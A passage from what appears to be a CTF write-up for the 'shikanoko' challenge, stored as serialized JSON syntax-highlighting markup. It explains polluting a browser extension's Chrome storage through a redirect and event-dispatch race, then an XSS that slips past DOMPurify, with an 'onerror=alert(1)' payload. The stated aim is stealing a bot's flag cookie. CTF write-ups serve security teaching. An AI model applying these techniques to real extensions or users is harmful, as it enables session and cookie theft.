document",{"type":33,"tag":128,"props":19789,"children":19790},{"style":312},[19791],{"type":38,"value":215},{"type":33,"tag":128,"props":19793,"children":19794},{"style":306},[19795],{"type":38,"value":8275},{"type":33,"tag":128,"props":19797,"children":19798},{"style":312},[19799],{"type":38,"value":5657},{"type":33,"tag":128,"props":19801,"children":19802},{"style":676},[19803],{"type":38,"value":679},{"type":33,"tag":128,"props":19805,"children":19806},{"style":140},[19807],{"type":38,"value":19808},"http://shikanoko.challenge:8547/",{"type":33,"tag":128,"props":19810,"children":19811},{"style":676},[19812],{"type":38,"value":669},{"type":33,"tag":128,"props":19814,"children":19815},{"style":312},[19816],{"type":38,"value":5676},{"type":33,"tag":128,"props":19818,"children":19819},{"class":130,"line":1001},[19820,19825,19829,19833,19837,19842,19846,19850,19854,19858],{"type":33,"tag":128,"props":19821,"children":19822},{"style":306},[19823],{"type":38,"value":19824}," html_elm",{"type":33,"tag":128,"props":19826,"children":19827},{"style":312},[19828],{"type":38,"value":5657},{"type":33,"tag":128,"props":19830,"children":19831},{"style":306},[19832],{"type":38,"value":7562},{"type":33,"tag":128,"props":19834,"children":19835},{"style":312},[19836],{"type":38,"value":215},{"type":33,"tag":128,"props":19838,"children":19839},{"style":135},[19840],{"type":38,"value":19841},"getElementById",{"type":33,"tag":128,"props":19843,"children":19844},{"style":312},[19845],{"type":38,"value":5566},{"type":33,"tag":128,"props":19847,"children":19848},{"style":676},[19849],{"type":38,"value":669},{"type":33,"tag":128,"props":19851,"children":19852},{"style":140},[19853],{"type":38,"value":5929},{"type":33,"tag":128,"props":19855,"children":19856},{"style":676},[19857],{"type":38,"value":669},{"type":33,"tag":128,"props":19859,"children":19860},{"style":312},[19861],{"type":38,"value":5815},{"type":33,"tag":128,"props":19863,"children":19864},{"class":130,"line":1014},[19865,19869,19873,19877,19881,19885,19889,19893],{"type":33,"tag":128,"props":19866,"children":19867},{"style":306},[19868],{"type":38,"value":19824},{"type":33,"tag":128,"props":19870,"children":19871},{"style":312},[19872],{"type":38,"value":215},{"type":33,"tag":128,"props":19874,"children":19875},{"style":306},[19876],{"type":38,"value":14160},{"type":33,"tag":128,"props":19878,"children":19879},{"style":312},[19880],{"type":38,"value":5657},{"type":33,"tag":128,"props":19882,"children":19883},{"style":676},[19884],{"type":38,"value":679},{"type":33,"tag":128,"props":19886,"children":19887},{"style":140},[19888],{"type":38,"value":19454},{"type":33,"tag":128,"props":19890,"children":19891},{"style":676},[19892],{"type":38,"value":669},{"type":33,"tag":128,"props":19894,"children":19895},{"style":312},[19896],{"type":38,"value":5676},{"type":33,"tag":128,"props":19898,"children":19899},{"class":130,"line":1026},[19900,19905,19909,19913,19917,19922,19926,19930,19934,19938],{"type":33,"tag":128,"props":19901,"children":19902},{"style":300},[19903],{"type":38,"value":19904}," let",{"type":33,"tag":128,"props":19906,"children":19907},{"style":306},[19908],{"type":38,"value":17575},{"type":33,"tag":128,"props":19910,"children":19911},{"style":312},[19912],{"type":38,"value":5657},{"type":33,"tag":128,"props":19914,"children":19915},{"style":300},[19916],{"type":38,"value":13061},{"type":33,"tag":128,"props":19918,"children":19919},{"style":135},[19920],{"type":38,"value":19921}," Event",{"type":33,"tag":128,"props":19923,"children":19924},{"style":312},[19925],{"type":38,"value":5566},{"type":33,"tag":128,"props":19927,"children":19928},{"style":676},[19929],{"type":38,"value":6040},{"type":33,"tag":128,"props":19931,"children":19932},{"style":140},[19933],{"type":38,"value":17521},{"type":33,"tag":128,"props":19935,"children":19936},{"style":676},[19937],{"type":38,"value":6040},{"type":33,"tag":128,"props":19939,"children":19940},{"style":312},[19941],{"type":38,"value":5815},{"type":33,"tag":128,"props":19943,"children":19944},{"class":130,"line":1038},[19945,19949,19953,19958,19962,19966],{"type":33,"tag":128,"props":19946,"children":19947},{"style":306},[19948],{"type":38,"value":19824},{"type":33,"tag":128,"props":19950,"children":19951},{"style":312},[19952],{"type":38,"value":215},{"type":33,"tag":128,"props":19954,"children":19955},{"style":135},[19956],{"type":38,"value":19957},"dispatchEvent",{"type":33,"tag":128,"props":19959,"children":19960},{"style":312},[19961],{"type":38,"value":5566},{"type":33,"tag":128,"props":19963,"children":19964},{"style":306},[19965],{"type":38,"value":17546},{"type":33,"tag":128,"props":19967,"children":19968},{"style":312},[19969],{"type":38,"value":5815},{"type":33,"tag":128,"props":19971,"children":19972},{"class":130,"line":1051},[19973],{"type":33,"tag":128,"props":19974,"children":19975},{"style":312},[19976],{"type":38,"value":19977}," })();\n",{"type":33,"tag":128,"props":19979,"children":19980},{"class":130,"line":1063},[19981,19985,19989],{"type":33,"tag":128,"props":19982,"children":19983},{"style":312},[19984],{"type":38,"value":14993},{"type":33,"tag":128,"props":19986,"children":19987},{"style":1576},[19988],{"type":38,"value":15064},{"type":33,"tag":128,"props":19990,"children":19991},{"style":312},[19992],{"type":38,"value":6097},{"type":33,"tag":128,"props":19994,"children":19995},{"class":130,"line":1076},[19996,20000,20004],{"type":33,"tag":128,"props":19997,"children":19998},{"style":312},[19999],{"type":38,"value":6190},{"type":33,"tag":128,"props":20001,"children":20002},{"style":1576},[20003],{"type":38,"value":5929},{"type":33,"tag":128,"props":20005,"children":20006},{"style":312},[20007],{"type":38,"value":6097},{"type":33,"tag":47,"props":20009,"children":20010},{},[20011,20013,20019,20021,20027],{"type":38,"value":20012},"The first part of the script performs a redirection with ",{"type":33,"tag":105,"props":20014,"children":20016},{"className":20015},[],[20017],{"type":38,"value":20018},"document.location",{"type":38,"value":20020},". This has the effect of using the challenge's origin, as the background script will be loaded and will take ",{"type":33,"tag":105,"props":20022,"children":20024},{"className":20023},[],[20025],{"type":38,"value":20026},"pendingURL",{"type":38,"value":20028}," to extract the origin.",{"type":33,"tag":47,"props":20030,"children":20031},{},[20032,20034,20040],{"type":38,"value":20033},"The second step updates the value of the page's input element and sends the change event. This triggers the ",{"type":33,"tag":105,"props":20035,"children":20037},{"className":20036},[],[20038],{"type":38,"value":20039},"contentScript",{"type":38,"value":20041}," event, which has the effect of updating the chrome storage linked to the origin of the pendingURL, which is the challenge's origin.",{"type":33,"tag":75,"props":20043,"children":20045},{"imgSrc":20044},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731271048/writeups/shikanoko/poc_race_localhost.webp",[],{"type":33,"tag":47,"props":20047,"children":20048},{},[20049,20051,20057,20059,20064],{"type":38,"value":20050},"Thus, from the origin ",{"type":33,"tag":105,"props":20052,"children":20054},{"className":20053},[],[20055],{"type":38,"value":20056},"localhost",{"type":38,"value":20058},", we were able to pollute the chrome cache of the origin: ",{"type":33,"tag":105,"props":20060,"children":20062},{"className":20061},[],[20063],{"type":38,"value":19446},{"type":38,"value":215},{"type":33,"tag":75,"props":20066,"children":20068},{"imgSrc":20067},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731271085/writeups/shikanoko/result_poc_race.webp",[],{"type":33,"tag":40,"props":20070,"children":20072},{"id":20071},"xss",[20073],{"type":38,"value":20074},"XSS",{"type":33,"tag":47,"props":20076,"children":20077},{},[20078],{"type":38,"value":20079},"So now we have seen that we can pollute the Chrome cache of our target. Now, we need to find a way to retrieve the bot's cookie that contains the flag.",{"type":33,"tag":47,"props":20081,"children":20082},{},[20083],{"type":38,"value":20084},"For this, we will examine in detail the functions that manipulate Chrome storage during the creation of an entry.",{"type":33,"tag":114,"props":20086,"children":20087},{"lang":5526},[20088],{"type":33,"tag":119,"props":20089,"children":20090},{"className":5530,"code":16378,"language":5526,"meta":8,"style":8},[20091],{"type":33,"tag":105,"props":20092,"children":20093},{"__ignoreMap":8},[20094,20117,20168,20227,20234,20353,20360,20367,20410,20561,20712,20743,20822],{"type":33,"tag":128,"props":20095,"children":20096},{"class":130,"line":131},[20097,20101,20105,20109,20113],{"type":33,"tag":128,"props":20098,"children":20099},{"style":300},[20100],{"type":38,"value":13008},{"type":33,"tag":128,"props":20102,"children":20103},{"style":135},[20104],{"type":38,"value":16394},{"type":33,"tag":128,"props":20106,"children":20107},{"style":312},[20108],{"type":38,"value":5566},{"type":33,"tag":128,"props":20110,"children":20111},{"style":306},[20112],{"type":38,"value":16154},{"type":33,"tag":128,"props":20114,"children":20115},{"style":312},[20116],{"type":38,"value":16407},{"type":33,"tag":128,"props":20118,"children":20119},{"class":130,"line":362},[20120,20124,20128,20132,20136,20140,20144,20148,20152,20156,20160,20164],{"type":33,"tag":128,"props":20121,"children":20122},{"style":1576},[20123],{"type":38,"value":16415},{"type":33,"tag":128,"props":20125,"children":20126},{"style":312},[20127],{"type":38,"value":2852},{"type":33,"tag":128,"props":20129,"children":20130},{"style":300},[20131],{"type":38,"value":16424},{"type":33,"tag":128,"props":20133,"children":20134},{"style":306},[20135],{"type":38,"value":16154},{"type":33,"tag":128,"props":20137,"children":20138},{"style":312},[20139],{"type":38,"value":215},{"type":33,"tag":128,"props":20141,"children":20142},{"style":135},[20143],{"type":38,"value":6957},{"type":33,"tag":128,"props":20145,"children":20146},{"style":312},[20147],{"type":38,"value":5566},{"type":33,"tag":128,"props":20149,"children":20150},{"style":676},[20151],{"type":38,"value":6040},{"type":33,"tag":128,"props":20153,"children":20154},{"style":140},[20155],{"type":38,"value":16449},{"type":33,"tag":128,"props":20157,"children":20158},{"style":676},[20159],{"type":38,"value":6040},{"type":33,"tag":128,"props":20161,"children":20162},{"style":312},[20163],{"type":38,"value":7088},{"type":33,"tag":128,"props":20165,"children":20166},{"style":312},[20167],{"type":38,"value":762},{"type":33,"tag":128,"props":20169,"children":20170},{"class":130,"line":403},[20171,20175,20179,20183,20187,20191,20195,20199,20203,20207,20211,20215,20219,20223],{"type":33,"tag":128,"props":20172,"children":20173},{"style":306},[20174],{"type":38,"value":16469},{"type":33,"tag":128,"props":20176,"children":20177},{"style":312},[20178],{"type":38,"value":5657},{"type":33,"tag":128,"props":20180,"children":20181},{"style":306},[20182],{"type":38,"value":16478},{"type":33,"tag":128,"props":20184,"children":20185},{"style":312},[20186],{"type":38,"value":215},{"type":33,"tag":128,"props":20188,"children":20189},{"style":135},[20190],{"type":38,"value":16487},{"type":33,"tag":128,"props":20192,"children":20193},{"style":312},[20194],{"type":38,"value":5566},{"type":33,"tag":128,"props":20196,"children":20197},{"style":676},[20198],{"type":38,"value":6040},{"type":33,"tag":128,"props":20200,"children":20201},{"style":140},[20202],{"type":38,"value":6054},{"type":33,"tag":128,"props":20204,"children":20205},{"style":676},[20206],{"type":38,"value":6040},{"type":33,"tag":128,"props":20208,"children":20209},{"style":312},[20210],{"type":38,"value":5584},{"type":33,"tag":128,"props":20212,"children":20213},{"style":676},[20214],{"type":38,"value":6739},{"type":33,"tag":128,"props":20216,"children":20217},{"style":140},[20218],{"type":38,"value":16516},{"type":33,"tag":128,"props":20220,"children":20221},{"style":676},[20222],{"type":38,"value":6040},{"type":33,"tag":128,"props":20224,"children":20225},{"style":312},[20226],{"type":38,"value":5815},{"type":33,"tag":128,"props":20228,"children":20229},{"class":130,"line":739},[20230],{"type":33,"tag":128,"props":20231,"children":20232},{"style":312},[20233],{"type":38,"value":845},{"type":33,"tag":128,"props":20235,"children":20236},{"class":130,"line":765},[20237,20241,20245,20249,20253,20257,20261,20265,20269,20273,20277,20281,20285,20289,20293,20297,20301,20305,20309,20313,20317,20321,20325,20329,20333,20337,20341,20345,20349],{"type":33,"tag":128,"props":20238,"children":20239},{"style":1576},[20240],{"type":38,"value":13056},{"type":33,"tag":128,"props":20242,"children":20243},{"style":306},[20244],{"type":38,"value":16478},{"type":33,"tag":128,"props":20246,"children":20247},{"style":312},[20248],{"type":38,"value":215},{"type":33,"tag":128,"props":20250,"children":20251},{"style":135},[20252],{"type":38,"value":16487},{"type":33,"tag":128,"props":20254,"children":20255},{"style":312},[20256],{"type":38,"value":5566},{"type":33,"tag":128,"props":20258,"children":20259},{"style":676},[20260],{"type":38,"value":7367},{"type":33,"tag":128,"props":20262,"children":20263},{"style":16561},[20264],{"type":38,"value":16564},{"type":33,"tag":128,"props":20266,"children":20267},{"style":16567},[20268],{"type":38,"value":215},{"type":33,"tag":128,"props":20270,"children":20271},{"style":523},[20272],{"type":38,"value":16574},{"type":33,"tag":128,"props":20274,"children":20275},{"style":16561},[20276],{"type":38,"value":669},{"type":33,"tag":128,"props":20278,"children":20279},{"style":676},[20280],{"type":38,"value":7367},{"type":33,"tag":128,"props":20282,"children":20283},{"style":312},[20284],{"type":38,"value":5584},{"type":33,"tag":128,"props":20286,"children":20287},{"style":676},[20288],{"type":38,"value":6739},{"type":33,"tag":128,"props":20290,"children":20291},{"style":140},[20292],{"type":38,"value":16595},{"type":33,"tag":128,"props":20294,"children":20295},{"style":676},[20296],{"type":38,"value":6040},{"type":33,"tag":128,"props":20298,"children":20299},{"style":312},[20300],{"type":38,"value":6700},{"type":33,"tag":128,"props":20302,"children":20303},{"style":135},[20304],{"type":38,"value":16487},{"type":33,"tag":128,"props":20306,"children":20307},{"style":312},[20308],{"type":38,"value":5566},{"type":33,"tag":128,"props":20310,"children":20311},{"style":676},[20312],{"type":38,"value":7367},{"type":33,"tag":128,"props":20314,"children":20315},{"style":16561},[20316],{"type":38,"value":16620},{"type":33,"tag":128,"props":20318,"children":20319},{"style":16567},[20320],{"type":38,"value":215},{"type":33,"tag":128,"props":20322,"children":20323},{"style":523},[20324],{"type":38,"value":16574},{"type":33,"tag":128,"props":20326,"children":20327},{"style":16561},[20328],{"type":38,"value":669},{"type":33,"tag":128,"props":20330,"children":20331},{"style":676},[20332],{"type":38,"value":7367},{"type":33,"tag":128,"props":20334,"children":20335},{"style":312},[20336],{"type":38,"value":5584},{"type":33,"tag":128,"props":20338,"children":20339},{"style":676},[20340],{"type":38,"value":6739},{"type":33,"tag":128,"props":20342,"children":20343},{"style":140},[20344],{"type":38,"value":16649},{"type":33,"tag":128,"props":20346,"children":20347},{"style":676},[20348],{"type":38,"value":6040},{"type":33,"tag":128,"props":20350,"children":20351},{"style":312},[20352],{"type":38,"value":5815},{"type":33,"tag":128,"props":20354,"children":20355},{"class":130,"line":804},[20356],{"type":33,"tag":128,"props":20357,"children":20358},{"style":312},[20359],{"type":38,"value":854},{"type":33,"tag":128,"props":20361,"children":20362},{"class":130,"line":839},[20363],{"type":33,"tag":128,"props":20364,"children":20365},{"emptyLinePlaceholder":896},[20366],{"type":38,"value":899},{"type":33,"tag":128,"props":20368,"children":20369},{"class":130,"line":848},[20370,20374,20378,20382,20386,20390,20394,20398,20402,20406],{"type":33,"tag":128,"props":20371,"children":20372},{"style":300},[20373],{"type":38,"value":13008},{"type":33,"tag":128,"props":20375,"children":20376},{"style":135},[20377],{"type":38,"value":16183},{"type":33,"tag":128,"props":20379,"children":20380},{"style":312},[20381],{"type":38,"value":5566},{"type":33,"tag":128,"props":20383,"children":20384},{"style":306},[20385],{"type":38,"value":13022},{"type":33,"tag":128,"props":20387,"children":20388},{"style":312},[20389],{"type":38,"value":5584},{"type":33,"tag":128,"props":20391,"children":20392},{"style":306},[20393],{"type":38,"value":13031},{"type":33,"tag":128,"props":20395,"children":20396},{"style":312},[20397],{"type":38,"value":5584},{"type":33,"tag":128,"props":20399,"children":20400},{"style":306},[20401],{"type":38,"value":16478},{"type":33,"tag":128,"props":20403,"children":20404},{"style":312},[20405],{"type":38,"value":2966},{"type":33,"tag":128,"props":20407,"children":20408},{"style":312},[20409],{"type":38,"value":762},{"type":33,"tag":128,"props":20411,"children":20412},{"class":130,"line":976},[20413,20417,20421,20425,20429,20433,20437,20441,20445,20449,20453,20457,20461,20465,20469,20473,20477,20481,20485,20489,20493,20497,20501,20505,20509,20513,20517,20521,20525,20529,20533,20537,20541,20545,20549,20553,20557],{"type":33,"tag":128,"props":20414,"children":20415},{"style":306},[20416],{"type":38,"value":16722},{"type":33,"tag":128,"props":20418,"children":20419},{"style":312},[20420],{"type":38,"value":5657},{"type":33,"tag":128,"props":20422,"children":20423},{"style":306},[20424],{"type":38,"value":5027},{"type":33,"tag":128,"props":20426,"children":20427},{"style":312},[20428],{"type":38,"value":215},{"type":33,"tag":128,"props":20430,"children":20431},{"style":135},[20432],{"type":38,"value":16487},{"type":33,"tag":128,"props":20434,"children":20435},{"style":312},[20436],{"type":38,"value":5566},{"type":33,"tag":128,"props":20438,"children":20439},{"style":676},[20440],{"type":38,"value":7367},{"type":33,"tag":128,"props":20442,"children":20443},{"style":16561},[20444],{"type":38,"value":5977},{"type":33,"tag":128,"props":20446,"children":20447},{"style":676},[20448],{"type":38,"value":7367},{"type":33,"tag":128,"props":20450,"children":20451},{"style":1576},[20452],{"type":38,"value":16759},{"type":33,"tag":128,"props":20454,"children":20455},{"style":312},[20456],{"type":38,"value":5584},{"type":33,"tag":128,"props":20458,"children":20459},{"style":676},[20460],{"type":38,"value":6739},{"type":33,"tag":128,"props":20462,"children":20463},{"style":140},[20464],{"type":38,"value":6351},{"type":33,"tag":128,"props":20466,"children":20467},{"style":676},[20468],{"type":38,"value":6040},{"type":33,"tag":128,"props":20470,"children":20471},{"style":312},[20472],{"type":38,"value":6700},{"type":33,"tag":128,"props":20474,"children":20475},{"style":135},[20476],{"type":38,"value":16487},{"type":33,"tag":128,"props":20478,"children":20479},{"style":312},[20480],{"type":38,"value":5566},{"type":33,"tag":128,"props":20482,"children":20483},{"style":676},[20484],{"type":38,"value":7367},{"type":33,"tag":128,"props":20486,"children":20487},{"style":16561},[20488],{"type":38,"value":6054},{"type":33,"tag":128,"props":20490,"children":20491},{"style":676},[20492],{"type":38,"value":7367},{"type":33,"tag":128,"props":20494,"children":20495},{"style":1576},[20496],{"type":38,"value":16759},{"type":33,"tag":128,"props":20498,"children":20499},{"style":312},[20500],{"type":38,"value":5584},{"type":33,"tag":128,"props":20502,"children":20503},{"style":676},[20504],{"type":38,"value":6739},{"type":33,"tag":128,"props":20506,"children":20507},{"style":140},[20508],{"type":38,"value":16816},{"type":33,"tag":128,"props":20510,"children":20511},{"style":676},[20512],{"type":38,"value":6040},{"type":33,"tag":128,"props":20514,"children":20515},{"style":312},[20516],{"type":38,"value":6700},{"type":33,"tag":128,"props":20518,"children":20519},{"style":135},[20520],{"type":38,"value":16487},{"type":33,"tag":128,"props":20522,"children":20523},{"style":312},[20524],{"type":38,"value":5566},{"type":33,"tag":128,"props":20526,"children":20527},{"style":676},[20528],{"type":38,"value":7367},{"type":33,"tag":128,"props":20530,"children":20531},{"style":16561},[20532],{"type":38,"value":669},{"type":33,"tag":128,"props":20534,"children":20535},{"style":676},[20536],{"type":38,"value":7367},{"type":33,"tag":128,"props":20538,"children":20539},{"style":1576},[20540],{"type":38,"value":16759},{"type":33,"tag":128,"props":20542,"children":20543},{"style":312},[20544],{"type":38,"value":5584},{"type":33,"tag":128,"props":20546,"children":20547},{"style":676},[20548],{"type":38,"value":6739},{"type":33,"tag":128,"props":20550,"children":20551},{"style":140},[20552],{"type":38,"value":6359},{"type":33,"tag":128,"props":20554,"children":20555},{"style":676},[20556],{"type":38,"value":6040},{"type":33,"tag":128,"props":20558,"children":20559},{"style":312},[20560],{"type":38,"value":2427},{"type":33,"tag":128,"props":20562,"children":20563},{"class":130,"line":988},[20564,20568,20572,20576,20580,20584,20588,20592,20596,20600,20604,20608,20612,20616,20620,20624,20628,20632,20636,20640,20644,20648,20652,20656,20660,20664,20668,20672,20676,20680,20684,20688,20692,20696,20700,20704,20708],{"type":33,"tag":128,"props":20565,"children":20566},{"style":306},[20567],{"type":38,"value":16876},{"type":33,"tag":128,"props":20569,"children":20570},{"style":312},[20571],{"type":38,"value":5657},{"type":33,"tag":128,"props":20573,"children":20574},{"style":306},[20575],{"type":38,"value":13031},{"type":33,"tag":128,"props":20577,"children":20578},{"style":312},[20579],{"type":38,"value":215},{"type":33,"tag":128,"props":20581,"children":20582},{"style":135},[20583],{"type":38,"value":16487},{"type":33,"tag":128,"props":20585,"children":20586},{"style":312},[20587],{"type":38,"value":5566},{"type":33,"tag":128,"props":20589,"children":20590},{"style":676},[20591],{"type":38,"value":7367},{"type":33,"tag":128,"props":20593,"children":20594},{"style":16561},[20595],{"type":38,"value":5977},{"type":33,"tag":128,"props":20597,"children":20598},{"style":676},[20599],{"type":38,"value":7367},{"type":33,"tag":128,"props":20601,"children":20602},{"style":1576},[20603],{"type":38,"value":16759},{"type":33,"tag":128,"props":20605,"children":20606},{"style":312},[20607],{"type":38,"value":5584},{"type":33,"tag":128,"props":20609,"children":20610},{"style":676},[20611],{"type":38,"value":6739},{"type":33,"tag":128,"props":20613,"children":20614},{"style":140},[20615],{"type":38,"value":6351},{"type":33,"tag":128,"props":20617,"children":20618},{"style":676},[20619],{"type":38,"value":6040},{"type":33,"tag":128,"props":20621,"children":20622},{"style":312},[20623],{"type":38,"value":6700},{"type":33,"tag":128,"props":20625,"children":20626},{"style":135},[20627],{"type":38,"value":16487},{"type":33,"tag":128,"props":20629,"children":20630},{"style":312},[20631],{"type":38,"value":5566},{"type":33,"tag":128,"props":20633,"children":20634},{"style":676},[20635],{"type":38,"value":7367},{"type":33,"tag":128,"props":20637,"children":20638},{"style":16561},[20639],{"type":38,"value":6054},{"type":33,"tag":128,"props":20641,"children":20642},{"style":676},[20643],{"type":38,"value":7367},{"type":33,"tag":128,"props":20645,"children":20646},{"style":1576},[20647],{"type":38,"value":16759},{"type":33,"tag":128,"props":20649,"children":20650},{"style":312},[20651],{"type":38,"value":5584},{"type":33,"tag":128,"props":20653,"children":20654},{"style":676},[20655],{"type":38,"value":6739},{"type":33,"tag":128,"props":20657,"children":20658},{"style":140},[20659],{"type":38,"value":16816},{"type":33,"tag":128,"props":20661,"children":20662},{"style":676},[20663],{"type":38,"value":6040},{"type":33,"tag":128,"props":20665,"children":20666},{"style":312},[20667],{"type":38,"value":6700},{"type":33,"tag":128,"props":20669,"children":20670},{"style":135},[20671],{"type":38,"value":16487},{"type":33,"tag":128,"props":20673,"children":20674},{"style":312},[20675],{"type":38,"value":5566},{"type":33,"tag":128,"props":20677,"children":20678},{"style":676},[20679],{"type":38,"value":7367},{"type":33,"tag":128,"props":20681,"children":20682},{"style":16561},[20683],{"type":38,"value":669},{"type":33,"tag":128,"props":20685,"children":20686},{"style":676},[20687],{"type":38,"value":7367},{"type":33,"tag":128,"props":20689,"children":20690},{"style":1576},[20691],{"type":38,"value":16759},{"type":33,"tag":128,"props":20693,"children":20694},{"style":312},[20695],{"type":38,"value":5584},{"type":33,"tag":128,"props":20697,"children":20698},{"style":676},[20699],{"type":38,"value":6739},{"type":33,"tag":128,"props":20701,"children":20702},{"style":140},[20703],{"type":38,"value":6359},{"type":33,"tag":128,"props":20705,"children":20706},{"style":676},[20707],{"type":38,"value":6040},{"type":33,"tag":128,"props":20709,"children":20710},{"style":312},[20711],{"type":38,"value":2427},{"type":33,"tag":128,"props":20713,"children":20714},{"class":130,"line":1001},[20715,20719,20723,20727,20731,20735,20739],{"type":33,"tag":128,"props":20716,"children":20717},{"style":300},[20718],{"type":38,"value":5637},{"type":33,"tag":128,"props":20720,"children":20721},{"style":306},[20722],{"type":38,"value":17032},{"type":33,"tag":128,"props":20724,"children":20725},{"style":312},[20726],{"type":38,"value":5657},{"type":33,"tag":128,"props":20728,"children":20729},{"style":135},[20730],{"type":38,"value":16394},{"type":33,"tag":128,"props":20732,"children":20733},{"style":312},[20734],{"type":38,"value":5566},{"type":33,"tag":128,"props":20736,"children":20737},{"style":306},[20738],{"type":38,"value":16154},{"type":33,"tag":128,"props":20740,"children":20741},{"style":312},[20742],{"type":38,"value":5815},{"type":33,"tag":128,"props":20744,"children":20745},{"class":130,"line":1014},[20746,20750,20754,20758,20762,20766,20770,20774,20778,20782,20786,20790,20794,20798,20802,20806,20810,20814,20818],{"type":33,"tag":128,"props":20747,"children":20748},{"style":1576},[20749],{"type":38,"value":13056},{"type":33,"tag":128,"props":20751,"children":20752},{"style":306},[20753],{"type":38,"value":17032},{"type":33,"tag":128,"props":20755,"children":20756},{"style":312},[20757],{"type":38,"value":215},{"type":33,"tag":128,"props":20759,"children":20760},{"style":135},[20761],{"type":38,"value":16487},{"type":33,"tag":128,"props":20763,"children":20764},{"style":312},[20765],{"type":38,"value":5566},{"type":33,"tag":128,"props":20767,"children":20768},{"style":676},[20769],{"type":38,"value":6040},{"type":33,"tag":128,"props":20771,"children":20772},{"style":140},[20773],{"type":38,"value":16355},{"type":33,"tag":128,"props":20775,"children":20776},{"style":676},[20777],{"type":38,"value":6040},{"type":33,"tag":128,"props":20779,"children":20780},{"style":312},[20781],{"type":38,"value":5584},{"type":33,"tag":128,"props":20783,"children":20784},{"style":306},[20785],{"type":38,"value":5027},{"type":33,"tag":128,"props":20787,"children":20788},{"style":312},[20789],{"type":38,"value":6700},{"type":33,"tag":128,"props":20791,"children":20792},{"style":135},[20793],{"type":38,"value":16487},{"type":33,"tag":128,"props":20795,"children":20796},{"style":312},[20797],{"type":38,"value":5566},{"type":33,"tag":128,"props":20799,"children":20800},{"style":676},[20801],{"type":38,"value":6040},{"type":33,"tag":128,"props":20803,"children":20804},{"style":140},[20805],{"type":38,"value":16362},{"type":33,"tag":128,"props":20807,"children":20808},{"style":676},[20809],{"type":38,"value":6040},{"type":33,"tag":128,"props":20811,"children":20812},{"style":312},[20813],{"type":38,"value":5584},{"type":33,"tag":128,"props":20815,"children":20816},{"style":306},[20817],{"type":38,"value":13031},{"type":33,"tag":128,"props":20819,"children":20820},{"style":312},[20821],{"type":38,"value":5815},{"type":33,"tag":128,"props":20823,"children":20824},{"class":130,"line":1026},[20825],{"type":33,"tag":128,"props":20826,"children":20827},{"style":312},[20828],{"type":38,"value":854},{"type":33,"tag":47,"props":20830,"children":20831},{},[20832,20834,20839,20841,20846,20847,20852,20853,20858],{"type":38,"value":20833},"We can see that the call to the ",{"type":33,"tag":105,"props":20835,"children":20837},{"className":20836},[],[20838],{"type":38,"value":15555},{"type":38,"value":20840}," function sanitizes each dangerous character ",{"type":33,"tag":105,"props":20842,"children":20844},{"className":20843},[],[20845],{"type":38,"value":5977},{"type":38,"value":5584},{"type":33,"tag":105,"props":20848,"children":20850},{"className":20849},[],[20851],{"type":38,"value":6054},{"type":38,"value":6345},{"type":33,"tag":105,"props":20854,"children":20856},{"className":20855},[],[20857],{"type":38,"value":669},{"type":38,"value":20859}," with their HTML entities. This is a good practice to avoid XSS, but it is not enough.",{"type":33,"tag":47,"props":20861,"children":20862},{},[20863],{"type":38,"value":20864},"However, the last parameter is not sanitized, and it's a parameter we can control because it's directly the outerHTML that we control during the creation of an entry.",{"type":33,"tag":47,"props":20866,"children":20867},{},[20868],{"type":38,"value":20869},"And we must provide a valid input on the ?html= parameter when retrieving our input because a DOMPurify on the latest version is applied on the parameters before insertion in DOM.",{"type":33,"tag":47,"props":20871,"children":20872},{},[20873,20875,20880],{"type":38,"value":20874},"So in the ",{"type":33,"tag":105,"props":20876,"children":20878},{"className":20877},[],[20879],{"type":38,"value":16370},{"type":38,"value":20881}," function, we can see that the outerHTML is replaced with a custom template system. It will replace the name and value attributes with the key and value entries coming from the Chrome cache.",{"type":33,"tag":47,"props":20883,"children":20884},{},[20885],{"type":38,"value":20886},"It is then possible for us to add an input that is completely correct for DOMPurify but will \"break\" the outerHTML at the output of the function to execute JavaScript.",{"type":33,"tag":47,"props":20888,"children":20889},{},[20890],{"type":38,"value":20891},"If we pass the string below as outerHTML of the input function:",{"type":33,"tag":114,"props":20893,"children":20894},{"lang":5929},[20895],{"type":33,"tag":119,"props":20896,"children":20898},{"className":5933,"code":20897,"language":5929,"meta":8,"style":8},"\u003Cinput\n type=\"image\"\n data-value=\"{{VALUE}} id=asrc=x name=\"\n value=\">{{VALUE}}\u003Cimg src=x onerror=alert(1)>\"\n name=\"ooo\"\n>\n",[20899],{"type":33,"tag":105,"props":20900,"children":20901},{"__ignoreMap":8},[20902,20914,20939,20964,20998,21023],{"type":33,"tag":128,"props":20903,"children":20904},{"class":130,"line":131},[20905,20909],{"type":33,"tag":128,"props":20906,"children":20907},{"style":312},[20908],{"type":38,"value":5977},{"type":33,"tag":128,"props":20910,"children":20911},{"style":1576},[20912],{"type":38,"value":20913},"input\n",{"type":33,"tag":128,"props":20915,"children":20916},{"class":130,"line":362},[20917,20922,20926,20930,20935],{"type":33,"tag":128,"props":20918,"children":20919},{"style":306},[20920],{"type":38,"value":20921}," type",{"type":33,"tag":128,"props":20923,"children":20924},{"style":312},[20925],{"type":38,"value":315},{"type":33,"tag":128,"props":20927,"children":20928},{"style":676},[20929],{"type":38,"value":669},{"type":33,"tag":128,"props":20931,"children":20932},{"style":140},[20933],{"type":38,"value":20934},"image",{"type":33,"tag":128,"props":20936,"children":20937},{"style":676},[20938],{"type":38,"value":836},{"type":33,"tag":128,"props":20940,"children":20941},{"class":130,"line":403},[20942,20947,20951,20955,20960],{"type":33,"tag":128,"props":20943,"children":20944},{"style":306},[20945],{"type":38,"value":20946}," data-value",{"type":33,"tag":128,"props":20948,"children":20949},{"style":312},[20950],{"type":38,"value":315},{"type":33,"tag":128,"props":20952,"children":20953},{"style":676},[20954],{"type":38,"value":669},{"type":33,"tag":128,"props":20956,"children":20957},{"style":140},[20958],{"type":38,"value":20959},"{{VALUE}} id=asrc=x 